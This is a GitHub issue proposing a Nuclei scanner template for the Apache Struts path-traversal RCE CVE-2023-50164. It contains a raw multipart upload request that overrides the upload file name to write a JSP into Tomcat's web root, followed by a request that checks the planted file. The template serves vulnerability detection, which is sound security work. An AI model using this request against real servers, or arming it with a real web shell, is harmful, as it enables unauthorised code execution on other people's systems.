### ISSUE TITLE
Apache Struts RCE Vulnerability 

### ISSUE THREAD

**Issue by Thirukrishnan** [projectdiscovery/nuclei-templates#8847]
### Template Information:

The template is written by setting up the environment and using a vulnerable application as given in the below resource.  
Resource: https://www.vicarius.io/vsociety/posts/apache-struts-rce-cve-2023-50164  
Kindly use my Dockerfile to set up the environment and test the template.  
https://github.com/Thirukrishnan/CVE-2023-50164-Apache-Struts-RCE

### Nuclei Template:

```yaml
id: CVE-2023-50164

info:
  name: Apache Struts RCE
  author: Thirukrishnan
  severity: critical
  description: |
    An attacker can manipulate file upload params to enable paths traversal and under some circumstances this can lead to uploading a malicious file which can be used to perform Remote Code Execution. 
  
http:
  - raw:
      - |
        POST /upload-1.0.0/upload.action HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------220150135571067095740752702
        Content-Length: 1112
        
        -----------------------------220150135571067095740752702
        Content-Disposition: form-data; name="Upload"; filename="webshell.war"
        Content-Type: application/octet-stream

        <%@ page language="java" contentType="text/html; charset=ISO-8859-1"
            pageEncoding="ISO-8859-1"%>
        <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
        <html>
        <head>
        <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
        <title>JSP - Hello World Tutorial - Programmer Gate</title>
        </head>
        <body>
        <%= "Hello World!" %>
        </body>
        </html>
        -----------------------------220150135571067095740752702
        Content-Disposition: form-data; name="uploadFileName"; 

        ../../opt/tomcat/webapps/ROOT/hw1.jsp
        -----------------------------220150135571067095740752702--

      - |
        GET /hw1.jsp HTTP/1.1
        Host: {{Hostname}}
        
    matchers:
      - type: dsl
        dsl:
          - 'contains(body_1,"successfully")'
          - 'contains(body_2,"Hello World!")'
           



```
